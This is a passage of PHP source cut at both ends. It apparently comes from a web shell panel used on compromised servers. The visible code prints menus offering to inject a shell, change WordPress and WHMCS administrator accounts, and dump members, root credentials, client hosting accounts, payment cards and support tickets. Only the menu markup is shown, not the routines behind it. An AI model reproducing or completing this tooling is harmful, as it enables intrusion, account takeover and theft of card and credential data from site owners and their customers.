[<a href="?sws=ms&op=sh"> Inject shell</a>]

[ <a href="?sws=ms&op=shm" >Show members Information</a>]
';


}



else if ($secript == 'wp')
{


  echo '
 <div class="cont">
 <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Wordpress </b><div>
<br />  <br /> <b>
[ <a href="?sws=ms&op=awp"> Change admin </a>]

[ <a href="?sws=ms&op=shwp" >Show members</a>]';


  }


else if ($secript == 'wh'){

  echo '
 <div class="cont">
 <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
<br />  <br /> <b>
[ <a href="?sws=ms&op=hroot">roots</a>]
[ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
[ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
[ <a href="?sws=ms&op=trak" >tickets</a>]
[ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
 [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
[ <a href="?sws=ms&op=cadmin"> Change admin </a>]';


}
else{echo '<d